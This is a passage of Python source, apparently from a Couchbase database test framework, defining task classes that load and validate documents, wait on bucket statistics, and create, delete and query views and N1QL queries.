batch_gen = BatchedDocumentGenerator(generator,
self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index],
batch_gen, self.op_type, self.exp,
task_identifier="%s_%s" % (self.thread_name,
task_instance),
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
scope=self.scope,
collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
skip_read_success_results=True,
sdk_retry_strategy=self.sdk_retry_strategy)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
self.fail.update(task.fail)
task_instance += 1
for task in doc_tasks:
self.task_manager.get_task_result(task)
del task
self.test_log.info("Closing SDK clients..")
for client in self.clients:
if client is not None:
client.close()
self.test_log.info("Done doc_ops on %s. Total iterations: %d"
% (bucket.name, self.itr_count))
def call(self):
self.start_task()
if self.buckets:
for bucket in self.buckets:
self._start_doc_ops(bucket)
else:
self._start_doc_ops(self.bucket)
self.complete_task()
class LoadDocumentsForDgmTask(LoadDocumentsGeneratorsTask):
def __init__(self, cluster, task_manager, bucket, clients, doc_gen, exp,
batch_size=50,
persist_to=0, replicate_to=0,
durability="",
timeout_secs=5,
process_concurrency=4, print_ops_rate=True,
active_resident_threshold=99,
dgm_batch=5000,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
skip_read_on_error=False,
suppress_error_table=False,
track_failures=True,
task_identifier="",
sdk_client_pool=None,
sdk_retry_strategy=None):
super(LoadDocumentsForDgmTask, self).__init__(
self, cluster, task_manager, bucket, clients, None,
"create", exp,
task_identifier="DGM_%s_%s_%s_%s" % (bucket.name, scope,
collection, time.time()))
self.cluster = cluster
self.exp = exp
self.doc_gen = doc_gen
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.timeout_secs = timeout_secs
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.active_resident_threshold = active_resident_threshold
self.dgm_batch = dgm_batch
self.task_identifier = task_identifier
self.skip_read_on_error = skip_read_on_error
self.suppress_error_table = suppress_error_table
self.track_failures = track_failures
self.op_type = "create"
self.rest_client = BucketHelper(self.cluster.master)
self.doc_index = self.doc_gen.start
self.docs_loaded_per_bucket = dict()
if isinstance(bucket, list):
self.buckets = bucket
else:
self.buckets = [bucket]
self.scope = scope
self.collection = collection
self.sdk_client_pool = sdk_client_pool
self.sdk_retry_strategy = sdk_retry_strategy
def _get_bucket_dgm(self, bucket):
"""
Returns a tuple of (active_rr, replica_rr)
"""
try:
active_resident_items_ratio = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"][
"vb_active_resident_items_ratio"][-1]
replica_resident_items_ratio = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"][
"vb_replica_resident_items_ratio"][-1]
except KeyError:
active_resident_items_ratio = replica_resident_items_ratio = 100
return active_resident_items_ratio, replica_resident_items_ratio
def _load_next_batch_of_docs(self, bucket):
doc_gens = [deepcopy(self.doc_gen)
for _ in range(self.process_concurrency)]
doc_tasks = list()
self.test_log.debug("Doc load from index %d" % self.doc_index)
for index in range(self.process_concurrency):
doc_gens[index].start = self.doc_index
doc_gens[index].itr = self.doc_index
doc_gens[index].end = self.doc_index + self.dgm_batch
self.doc_index += self.dgm_batch
self.docs_loaded_per_bucket[bucket] += self.dgm_batch
# Start doc_loading tasks
for index, doc_gen in enumerate(doc_gens):
batch_gen = BatchedDocumentGenerator(doc_gen, self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index], batch_gen,
"create", self.exp,
scope=self.scope,
collection=self.collection,
task_identifier=self.thread_name,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
timeout_secs=self.timeout_secs,
skip_read_on_error=self.skip_read_on_error,
suppress_error_table=self.suppress_error_table,
track_failures=self.track_failures,
sdk_client_pool=self.sdk_client_pool,
sdk_retry_strategy=self.sdk_retry_strategy)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
# Wait for doc_loading tasks to complete
for task in doc_tasks:
self.task_manager.get_task_result(task)
def _load_bucket_into_dgm(self, bucket):
"""
Load bucket into dgm until either active_rr or replica_rr
goes below self.active_resident_threshold
"""
active_dgm_value, replica_dgm_value = self._get_bucket_dgm(bucket)
self.test_log.info("DGM doc loading for '%s' to atleast %s%%"
% (bucket.name, self.active_resident_threshold))
while active_dgm_value > self.active_resident_threshold and \
replica_dgm_value > self.active_resident_threshold:
self.test_log.info("Active_resident_items_ratio for {0} is {1}"
.format(bucket.name, active_dgm_value))
self.test_log.info("Replica_resident_items_ratio for {0} is {1}"
.format(bucket.name, replica_dgm_value))
self._load_next_batch_of_docs(bucket)
active_dgm_value, replica_dgm_value = self._get_bucket_dgm(bucket)
self.test_log.info(
"Active DGM %s%% Replica DGM %s%% achieved for '%s'. Loaded docs: %s"
% (active_dgm_value, replica_dgm_value, bucket.name,
self.docs_loaded_per_bucket[bucket]))
def call(self):
self.test_log.info("Starting DGM doc loading task")
self.start_task()
for bucket in self.buckets:
self.docs_loaded_per_bucket[bucket] = 0
self._load_bucket_into_dgm(bucket)
collection = bucket.scopes[self.scope].collections[self.collection]
collection.num_items += self.docs_loaded_per_bucket[bucket]
collection.doc_index = (collection.doc_index[0],
collection.doc_index[1] +
self.docs_loaded_per_bucket[bucket])
# Close all SDK clients
if self.sdk_client_pool is None:
for client in self.clients:
client.close()
self.complete_task()
self.test_log.info("Done loading docs for DGM")
class ValidateDocumentsTask(GenericLoadingTask):
def __init__(self, cluster, bucket, client, generator, op_type, exp,
flag=0, proxy_client=None, batch_size=1,
timeout_secs=30, time_unit="seconds",
compression=None, check_replica=False,
sdk_client_pool=None,
sdk_retry_strategy=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
is_sub_doc=False,
suppress_error_table=False):
super(ValidateDocumentsTask, self).__init__(
cluster, bucket, client, batch_size=batch_size,
timeout_secs=timeout_secs,
time_unit=time_unit,
compression=compression,
sdk_client_pool=sdk_client_pool,
sdk_retry_strategy=sdk_retry_strategy,
scope=scope, collection=collection)
self.thread_name = "ValidateDocumentsTask-%s_%s_%s_%s_%s_%s_%s" % (
bucket.name,
self.scope,
self.collection,
generator._doc_gen.start,
generator._doc_gen.end,
op_type, time.time())
self.generator = generator
self.skip_doc_gen_value = False
self.op_type = op_type
if self.op_type in [DocLoading.Bucket.DocOps.DELETE]:
self.skip_doc_gen_value = True
self.exp = exp
self.flag = flag
self.suppress_error_table = suppress_error_table
if not self.suppress_error_table:
self.failed_item_table = TableView(self.test_log.info)
self.failed_item_table.set_headers(["READ Key", "Exception"])
self.missing_keys = []
self.wrong_values = []
self.failed_reads = dict()
if proxy_client:
self.log.debug("Changing client to proxy %s:%s..."
% (proxy_client.host, proxy_client.port))
self.client = proxy_client
self.check_replica = check_replica
self.replicas = bucket.replicaNumber
self.client = client
self.is_sub_doc = is_sub_doc
def has_next(self):
return self.generator.has_next()
def __validate_sub_docs(self, doc_gen):
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
key_value = dict(doc_gen.next_batch(self.skip_doc_gen_value))
self.test_log.info(key_value)
result_map, self.failed_reads = self.batch_read(key_value.keys())
self.test_log.info(result_map)
self.test_log.info(self.failed_reads)
if self.sdk_client_pool:
self.sdk_client_pool.release_client(self.client)
self.client = None
return
op_failed_tbl = TableView(self.log.error)
op_failed_tbl.set_headers(["Update Key",
"Value"])
for key, value in task.success.items():
doc_value = value["value"]
failed_row = [key, doc_value]
if doc_value[0] != 0:
op_failed_tbl.add_row(failed_row)
elif doc_value[1] != "LastNameUpdate":
op_failed_tbl.add_row(failed_row)
elif doc_value[2] != "TypeChange":
op_failed_tbl.add_row(failed_row)
elif doc_value[3] != "CityUpdate":
op_failed_tbl.add_row(failed_row)
elif Json.loads(str(doc_value[4])) \
!= ["get", "up"]:
op_failed_tbl.add_row(failed_row)
op_failed_tbl.display("Keys failed in %s:%s:%s"
% (self.bucket.name,
self.scope,
self.collection))
if len(op_failed_tbl.rows) != 0:
self.fail("Update failed for few keys")
op_failed_tbl = TableView(self.log.error)
op_failed_tbl.set_headers(["Delete Key",
"Value"])
for key, value in task.success.items():
doc_value = value["value"]
failed_row = [key, doc_value]
if doc_value[0] != 2:
op_failed_tbl.add_row(failed_row)
for index in range(1, len(doc_value)):
if doc_value[index] != "PATH_NOT_FOUND":
op_failed_tbl.add_row(failed_row)
for key, value in task.fail.items():
op_failed_tbl.add_row([key, value["value"]])
op_failed_tbl.display("Keys failed in %s:%s:%s"
% (self.bucket.name,
self.scope,
self.collection))
if len(op_failed_tbl.rows) != 0:
self.fail("Delete failed for few keys")
def __validate_docs(self, doc_gen):
if self.sdk_client_pool is not None:
self.client = \
self.sdk_client_pool.get_client_for_bucket(self.bucket,
self.scope,
self.collection)
key_value = dict(doc_gen.next_batch(self.skip_doc_gen_value))
if self.check_replica:
# change to getFromReplica
result_map = dict()
self.failed_reads = dict()
for key in key_value.keys():
try:
result = self.client.get_from_all_replicas(key)
if all(_result for _result in result) \
and len(result) == min(self.replicas + 1,
len(
self.cluster.nodes_in_cluster)):
key = key.decode()
if result[0]["status"]:
result_map[key] = dict()
result_map[key]["value"] = result[0]["value"]
result_map[key]["cas"] = result[0]["cas"]
elif result:
self.failed_reads[key] = dict()
self.failed_reads[key]["cas"] = result[0]["cas"]
self.failed_reads[key]["error"] = result
self.failed_reads[key]["value"] = dict()
else:
self.failed_reads[key] = dict()
self.failed_reads[key]["cas"] = 0
self.failed_reads[key]["error"] = \
SDKException.DocumentNotFoundException
self.failed_reads[key]["value"] = dict()
except Exception as error:
self.exception = error
return
else:
result_map, self.failed_reads = self.batch_read(key_value.keys())
if self.sdk_client_pool:
self.sdk_client_pool.release_client(self.client)
self.client = None
if not self.suppress_error_table:
for key, value in self.failed_reads.items():
if SDKException.DocumentNotFoundException \
not in str(self.failed_reads[key]["error"]):
self.failed_item_table.add_row([key, value['error']])
missing_keys, wrong_values = self.validate_key_val(result_map,
key_value)
if self.op_type == 'delete':
not_missing = []
if missing_keys.__len__() != key_value.keys().__len__():
for key in key_value.keys():
if key not in missing_keys:
not_missing.append(key)
if not_missing:
self.exception = Exception("Keys were not deleted. "
"Keys not deleted: {}"
.format(','.join(not_missing)))
else:
if missing_keys:
self.exception = Exception("Total %d keys missing: %s"
% (missing_keys.__len__(),
missing_keys))
self.missing_keys.extend(missing_keys)
if wrong_values:
self.exception = Exception("Total %s wrong key-values :: %s"
% (wrong_values.__len__(),
wrong_values))
self.wrong_values.extend(wrong_values)
if self.exception:
raise(self.exception)
def next(self, override_generator=None):
doc_gen = override_generator or self.generator
if self.is_sub_doc:
self.__validate_sub_docs(doc_gen)
else:
self.__validate_docs(doc_gen)
def validate_key_val(self, map, key_value):
missing_keys = []
wrong_values = []
for key, value in key_value.items():
if key in map:
if type(value) == JsonObject:
expected_val = Json.loads(value.toString())
else:
expected_val = Json.loads(value)
if map[key]['cas'] != 0:
actual_val = Json.loads(map[key][
'value'].toString())
elif map[key]['error'] is not None:
actual_val = map[key]['error'].toString()
else:
missing_keys.append(key)
continue
actual_val["mutated"] = int(actual_val["mutated"])
expected_val["mutated"] = int(expected_val["mutated"])
if expected_val == actual_val:
continue
else:
wrong_value = "Key: {} Expected: {} Actual: {}" \
.format(key, expected_val, actual_val)
wrong_values.append(wrong_value)
elif SDKException.DocumentNotFoundException \
in str(self.failed_reads[key]["error"]):
missing_keys.append(key)
return missing_keys, wrong_values
class DocumentsValidatorTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generators,
op_type, exp, flag=0, batch_size=1,
timeout_secs=60, time_unit="seconds",
compression=None,
process_concurrency=4, check_replica=False,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
sdk_client_pool=None,
sdk_retry_strategy=None,
is_sub_doc=False,
suppress_error_table=False):
super(DocumentsValidatorTask, self).__init__(
"DocumentsValidatorTask_%s_%s_%s" % (
bucket.name, op_type, time.time()))
self.cluster = cluster
self.exp = exp
self.flag = flag
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.sdk_client_pool = sdk_client_pool
self.sdk_retry_strategy = sdk_retry_strategy
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.suppress_error_table = suppress_error_table
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.scope = scope
self.collection = collection
self.check_replica = check_replica
self.is_sub_doc = is_sub_doc
def call(self):
self.start_task()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = []
exception = None
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
self.task_manager.get_task_result(task)
if not self.suppress_error_table:
task.failed_item_table.display(
"DocValidator failure for %s:%s:%s"
% (self.bucket.name, self.scope, self.collection))
except Exception as e:
self.result = False
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.debug("Task '%s' complete." % (task.thread_name))
self.test_log.error(e)
if not self.sdk_client_pool:
for client in self.clients:
client.close()
self.set_exception(e)
self.complete_task()
if not self.sdk_client_pool:
for client in self.clients:
client.close()
self.complete_task()
if exception:
self.set_exception(exception)
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = int(generator.end)
gen_range = max(
int((generator.end - generator.start) / self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = ValidateDocumentsTask(
self.cluster, self.bucket, self.clients[i], generators[i],
self.op_type, self.exp, self.flag, batch_size=self.batch_size,
timeout_secs=self.timeout_secs,
time_unit=self.time_unit,
compression=self.compression, check_replica=self.check_replica,
scope=self.scope, collection=self.collection,
sdk_client_pool=self.sdk_client_pool,
sdk_retry_strategy=self.sdk_retry_strategy,
is_sub_doc=self.is_sub_doc,
suppress_error_table=self.suppress_error_table)
tasks.append(task)
return tasks
class StatsWaitTask(Task):
EQUAL = '=='
NOT_EQUAL = '!='
LESS_THAN = '<'
LESS_THAN_EQ = '<='
GREATER_THAN = '>'
GREATER_THAN_EQ = '>='
def __init__(self, shell_conn_list, bucket, stat_cmd, stat, comparison,
value, timeout=300):
super(StatsWaitTask, self).__init__("StatsWaitTask_%s_%s_%s"
% (bucket.name,
stat,
str(time.time())))
self.shellConnList = shell_conn_list
self.bucket = bucket
self.statCmd = stat_cmd
self.stat = stat
self.comparison = comparison
self.value = value
self.stop = False
self.timeout = timeout
self.cbstatObjList = list()
def call(self):
self.start_task()
start_time = time.time()
timeout = start_time + self.timeout
for remote_conn in self.shellConnList:
self.cbstatObjList.append(Cbstats(remote_conn))
try:
while not self.stop and time.time() < timeout:
if self.statCmd in ["all", "dcp"]:
self._get_all_stats_and_compare()
elif self.statCmd == "checkpoint":
if self.bucket.bucketType != Bucket.Type.MEMBASE:
self.stop = True
break
self._get_checkpoint_stats_and_compare()
else:
raise Exception("Not supported. Implement the stat call")
finally:
pass
if time.time() > timeout:
for shell in self.shellConnList:
shell.disconnect()
self.set_exception("Could not verify stat {} within timeout {}"
.format(self.stat, self.timeout))
self.complete_task()
def _get_all_stats_and_compare(self):
stat_result = 0
val_dict = dict()
retry = 10
while retry > 0:
try:
for cb_stat_obj in self.cbstatObjList:
tem_stat = cb_stat_obj.all_stats(self.bucket.name,
stat_name=self.statCmd)
val_dict[cb_stat_obj.shellConn.ip] = tem_stat[self.stat]
if self.stat in tem_stat:
stat_result += int(tem_stat[self.stat])
break
except Exception as error:
if retry > 0:
retry -= 1
sleep(5, "MC is down. Retrying.. %s" % str(error))
continue
for shell in self.shellConnList:
shell.disconnect()
self.set_exception(error)
self.stop = True
if not self._compare(self.comparison, str(stat_result), self.value):
self.log.debug("Not Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.log.debug("Wait before next StatWaitTask check")
sleep(5, log_type="infra")
else:
self.test_log.debug("Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.stop = True
def _get_checkpoint_stats_and_compare(self):
stat_result = 0
val_dict = dict()
retry = 5
while retry > 0:
try:
for cb_stat_obj in self.cbstatObjList:
tem_stat = cb_stat_obj.checkpoint_stats(self.bucket.name)
node_stat_val = 0
for vb in tem_stat:
node_stat_val += tem_stat[vb][self.stat]
val_dict[cb_stat_obj.shellConn.ip] = node_stat_val
stat_result += node_stat_val
break
except Exception as error:
if retry > 0:
retry -= 1
sleep(5, "MC is down. Retrying.. %s" % str(error))
continue
for shell in self.shellConnList:
shell.disconnect()
self.set_exception(error)
self.stop = True
if not self._compare(self.comparison, str(stat_result), self.value):
self.test_log.debug("Not Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.log.debug("Wait before next StatWaitTask check")
sleep(5, log_type="infra")
else:
self.test_log.debug("Ready: %s %s %s %s. "
"Received: %s for bucket '%s'"
% (self.stat, stat_result, self.comparison,
self.value, val_dict, self.bucket.name))
self.stop = True
def _compare(self, cmp_type, a, b):
if isinstance(b, (int, long)) and a.isdigit():
a = long(a)
elif isinstance(b, (int, long)) and not a.isdigit():
return False
self.test_log.debug("Comparing %s %s %s" % (a, cmp_type, b))
if (cmp_type == StatsWaitTask.EQUAL and a == b) or \
(cmp_type == StatsWaitTask.NOT_EQUAL and a != b) or \
(cmp_type == StatsWaitTask.LESS_THAN_EQ and a <= b) or \
(cmp_type == StatsWaitTask.GREATER_THAN_EQ and a >= b) or \
(cmp_type == StatsWaitTask.LESS_THAN and a < b) or \
(cmp_type == StatsWaitTask.GREATER_THAN and a > b):
return True
return False
class ViewCreateTask(Task):
def __init__(self, server, design_doc_name, view,
bucket="default", with_query=True,
check_replication=False, ddoc_options=None):
super(ViewCreateTask, self).__init__("ViewCreateTask_%s_%s_%s"
% (bucket, view, time.time()))
self.server = server
self.bucket = bucket
self.view = view
prefix = ""
if self.view:
prefix = ("", "dev_")[self.view.dev_view]
if design_doc_name.find('/') != -1:
design_doc_name = design_doc_name.replace('/', '%2f')
self.design_doc_name = prefix + design_doc_name
self.ddoc_rev_no = 0
self.with_query = with_query
self.check_replication = check_replication
self.ddoc_options = ddoc_options
self.rest = RestConnection(self.server)
def call(self):
self.start_task()
try:
# appending view to existing design doc
content, meta = self.rest.get_ddoc(self.bucket,
self.design_doc_name)
ddoc = DesignDocument._init_from_json(self.design_doc_name,
content)
# if view is to be updated
if self.view:
if self.view.is_spatial:
ddoc.add_spatial_view(self.view)
else:
ddoc.add_view(self.view)
self.ddoc_rev_no = self._parse_revision(meta['rev'])
except ReadDocumentException:
# creating first view in design doc
if self.view:
if self.view.is_spatial:
ddoc = DesignDocument(self.design_doc_name, [],
spatial_views=[self.view])
else:
ddoc = DesignDocument(self.design_doc_name, [self.view])
# create an empty design doc
else:
ddoc = DesignDocument(self.design_doc_name, [])
if self.ddoc_options:
ddoc.options = self.ddoc_options
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return 0
try:
self.rest.create_design_document(self.bucket, ddoc)
return_value = self.check()
self.complete_task()
return return_value
except DesignDocCreationException as e:
self.set_exception(e)
self.complete_task()
return 0
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return 0
def check(self):
try:
# only query if the DDoc has a view
if self.view:
if self.with_query:
query = {"stale": "ok"}
if self.view.is_spatial:
content = self.rest.query_view(
self.design_doc_name, self.view.name,
self.bucket, query, type="spatial")
else:
content = self.rest.query_view(
self.design_doc_name, self.view.name,
self.bucket, query)
else:
_, json_parsed, _ = self.rest._get_design_doc(
self.bucket, self.design_doc_name)
if self.view.is_spatial:
if self.view.name not in json_parsed["spatial"].keys():
self.set_exception(
Exception(
"design doc {0} doesn't contain spatial view {1}"
.format(self.design_doc_name,
self.view.name)))
return 0
else:
if self.view.name not in json_parsed["views"].keys():
self.set_exception(Exception(
"design doc {0} doesn't contain view {1}"
.format(self.design_doc_name,
self.view.name)))
return 0
self.test_log.debug(
"View: {0} was created successfully in ddoc: {1}"
.format(self.view.name, self.design_doc_name))
else:
# If we are here, it means design doc was successfully updated
self.test_log.debug("Design Doc: {0} was updated successfully"
.format(self.design_doc_name))
if self._check_ddoc_revision():
return self.ddoc_rev_no
else:
self.set_exception(Exception("failed to update design doc"))
if self.check_replication:
self._check_ddoc_replication_on_nodes()
except QueryViewException as e:
if e.message.find('not_found') or e.message.find(
'view_undefined') > -1:
self.check()
else:
self.set_exception(e)
return 0
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return 0
def _check_ddoc_revision(self):
valid = False
try:
content, meta = self.rest.get_ddoc(self.bucket,
self.design_doc_name)
new_rev_id = self._parse_revision(meta['rev'])
if new_rev_id != self.ddoc_rev_no:
self.ddoc_rev_no = new_rev_id
valid = True
except ReadDocumentException:
pass
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
return valid
def _parse_revision(self, rev_string):
return int(rev_string.split('-')[0])
def _check_ddoc_replication_on_nodes(self):
nodes = self.rest.node_statuses()
retry_count = 3
# nothing to check if there is only 1 node
if len(nodes) <= 1:
return
for node in nodes:
server_info = {"ip": node.ip,
"port": node.port,
"username": self.rest.username,
"password": self.rest.password}
for count in xrange(retry_count):
try:
rest_node = RestConnection(server_info)
content, meta = rest_node.get_ddoc(self.bucket,
self.design_doc_name)
new_rev_id = self._parse_revision(meta['rev'])
if new_rev_id == self.ddoc_rev_no:
break
else:
self.test_log.debug(
"Design Doc {0} version is not updated on node {1}:{2}. Retrying."
.format(self.design_doc_name,
node.ip, node.port))
sleep(2)
except ReadDocumentException as e:
if count < retry_count:
self.test_log.debug(
"Design Doc {0} not yet available on node {1}:{2}. Retrying."
.format(self.design_doc_name,
node.ip, node.port))
sleep(2)
else:
self.test_log.error(
"Design Doc {0} failed to replicate on node {1}:{2}"
.format(self.design_doc_name, node.ip,
node.port))
self.set_exception(e)
break
except Exception as e:
if count < retry_count:
self.test_log.error("Unexpected exception: %s. "
"Will retry after sleep.." % e)
sleep(2)
else:
self.set_exception(e)
break
else:
self.set_exception(Exception(
"Design Doc {0} version mismatch on node {1}:{2}"
.format(self.design_doc_name, node.ip, node.port)))
class ViewDeleteTask(Task):
def __init__(self, server, design_doc_name, view, bucket="default"):
Task.__init__(self, "Delete_view_task_%s_%s_%s"
% (bucket, view, time.time()))
self.server = server
self.bucket = bucket
self.view = view
prefix = ""
if self.view:
prefix = ("", "dev_")[self.view.dev_view]
self.design_doc_name = prefix + design_doc_name
def call(self):
self.start_task()
try:
rest = RestConnection(self.server)
if self.view:
# remove view from existing design doc
content, header = rest.get_ddoc(self.bucket,
self.design_doc_name)
ddoc = DesignDocument._init_from_json(self.design_doc_name,
content)
if self.view.is_spatial:
status = ddoc.delete_spatial(self.view)
else:
status = ddoc.delete_view(self.view)
if not status:
self.set_exception(Exception('View does not exist! %s'
% (self.view.name)))
self.complete_task()
return False
# update design doc
rest.create_design_document(self.bucket, ddoc)
return_value = self.check()
self.complete_task()
return return_value
else:
# delete the design doc
rest.delete_view(self.bucket, self.design_doc_name)
self.test_log.debug("Design Doc : {0} was successfully deleted"
.format(self.design_doc_name))
self.complete_task()
return True
except (ValueError, ReadDocumentException,
DesignDocCreationException) as e:
self.set_exception(e)
self.complete_task()
return False
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
return False
def check(self):
try:
rest = RestConnection(self.server)
# make sure view was deleted
query = {"stale": "ok"}
content = rest.query_view(self.design_doc_name, self.view.name,
self.bucket, query)
return False
except QueryViewException as e:
self.test_log.debug(
"View: {0} was successfully deleted in ddoc: {1}"
.format(self.view.name, self.design_doc_name))
return True
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
class ViewQueryTask(Task):
def __init__(self, server, design_doc_name, view_name,
query, expected_rows=None,
bucket="default", retry_time=2):
Task.__init__(self, "Query_view_task_%s_%s_%s"
% (bucket, design_doc_name, view_name))
self.server = server
self.bucket = bucket
self.view_name = view_name
self.design_doc_name = design_doc_name
self.query = query
self.expected_rows = expected_rows
self.retry_time = retry_time
self.timeout = 900
def call(self):
self.start_task()
retries = 0
while retries < self.retry_time:
try:
rest = RestConnection(self.server)
# make sure view can be queried
content = \
rest.query_view(self.design_doc_name, self.view_name,
self.bucket, self.query, self.timeout)
if self.expected_rows is None:
# no verification
self.result = True
self.complete_task()
return content
else:
return_value = self.check()
self.result = return_value
self.complete_task()
return return_value
except QueryViewException as e:
self.test_log.debug("Initial query failed. "
"Will retry after sleep..")
sleep(self.retry_time)
retries += 1
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
self.complete_task()
self.result = True
return False
def check(self):
try:
rest = RestConnection(self.server)
# query and verify expected num of rows returned
content = \
rest.query_view(self.design_doc_name, self.view_name,
self.bucket, self.query, self.timeout)
self.test_log.debug(
"Server: %s, Design Doc: %s, View: %s, (%d rows) expected, (%d rows) returned"
% (self.server.ip, self.design_doc_name,
self.view_name, self.expected_rows,
len(content['rows'])))
raised_error = content.get(u'error', '') or \
''.join([str(item) for item in
content.get(u'errors', [])])
if raised_error:
raise QueryViewException(self.view_name, raised_error)
if len(content['rows']) == self.expected_rows:
self.test_log.debug(
"Expected rows: '{0}' was found for view query"
.format(self.expected_rows))
return True
else:
if len(content['rows']) > self.expected_rows:
raise QueryViewException(self.view_name,
"Server: {0}, Design Doc: {1}, actual returned rows: '{2}' are greater than expected {3}"
.format(self.server.ip,
self.design_doc_name,
len(content['rows']),
self.expected_rows, ))
if "stale" in self.query:
if self.query["stale"].lower() == "false":
return False
self.test_log.debug("Retry until expected results "
"or task times out")
sleep(self.retry_time)
self.check()
except QueryViewException as e:
# subsequent query failed! exit
self.set_exception(e)
return False
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
return False
class N1QLQueryTask(Task):
def __init__(self, server, bucket, query, n1ql_helper=None,
expected_result=None, verify_results=True,
is_explain_query=False, index_name=None, retry_time=2,
scan_consistency=None, scan_vector=None, timeout=900):
super(N1QLQueryTask, self).__init__("query_n1ql_task_%s_%s_%s"
% (bucket, query, time.time()))
self.server = server
self.bucket = bucket
self.query = query
self.expected_result = expected_result
self.n1ql_helper = n1ql_helper
self.timeout = timeout
self.verify_results = verify_results
self.is_explain_query = is_explain_query
self.index_name = index_name
self.retry_time = 2
self.retried = 0
self.scan_consistency = scan_consistency
self.scan_vector = scan_vector
def call(self):
self.start_task()
try:
# Query and get results
self.test_log.debug(" <<<<< START Executing Query {0} >>>>>>"
.format(self.query))
if not self.is_explain_query:
self.msg, self.isSuccess = self.n1ql_helper.run_query_and_verify_result(
query=self.query, server=self.server,
expected_result=self.expected_result,
scan_consistency=self.scan_consistency,
scan_vector=self.scan_vector,
verify_results=self.verify_results)
else:
self.actual_result = self.n1ql_helper.run_cbq_query(
query=self.query, server=self.server)
self.test_log.debug(self.actual_result)
self.test_log.debug(" <<<<< Done Executing Query {0} >>>>>>"
.format(self.query))
return_value = self.check()
self.complete_task()
return return_value
except N1QLQueryException:
self.test_log.debug("Initial query failed, will retry..")
if self.retried < self.retry_time:
self.retried += 1
sleep(self.retry_time)
self.call()
# catch and set all unexpected exceptions
except Exception as e:
self.complete_task()
self.set_exception(e)
def check(self):
try:
# Verify correctness of result set
if self.verify_results:
if not self.is_explain_query:
if not self.isSuccess:
self.test_log.debug("Incorrect query results for %s"
% self.query)
raise N1QLQueryException(self.msg)
else:
check = self.n1ql_helper.verify_index_with_explain(
self.actual_result, self.index_name)
if not check:
actual_result = self.n1ql_helper.run_cbq_query(
query="select * from system:indexes",
server=self.server)
self.test_log.debug(actual_result)
raise Exception("INDEX usage in Query %s :: "
"NOT FOUND %s :: "
"as observed in result %s"
% (self.query, self.index_name,
self.actual_result))
self.test_log.debug(" <<<<< Done VERIFYING Query {0} >>>>>>"
.format(self.query))
return True
except N1QLQueryException as e:
# subsequent query failed! exit
self.set_exception(e)
# catch and set all unexpected exceptions
except Exception as e:
self.set_exception(e)
class RunQueriesTask(Task):
"""
Task that runs CBAS and N1QL queries
runs all queries given in the queries list
Parameters:
server - server on which n1ql query should run (TestInputServer)
queries - List of either cbas or n1ql queries (list)
task_manager - task manager object to run parallel tasks (TaskManager)
helper - helper object either cbas or n1ql(CbasUtilV2, CbasUtil,
N1QLHelper)
query_type - type of query legal values are cbas, n1ql (string)
is_prepared - Prepares the queries in the list if false (string)
-- Unprepared query eg:
select count(*) from {0} where mutated > 0;
"""
def __init__(self, cluster, queries, task_manager, helper, query_type,
run_infinitely=False, parallelism=1, is_prepared=True):
super(RunQueriesTask, self).__init__("RunQueriesTask_started_%s"
% (time.time()))
self.cluster = cluster
self.queries = queries
self.query_type = query_type
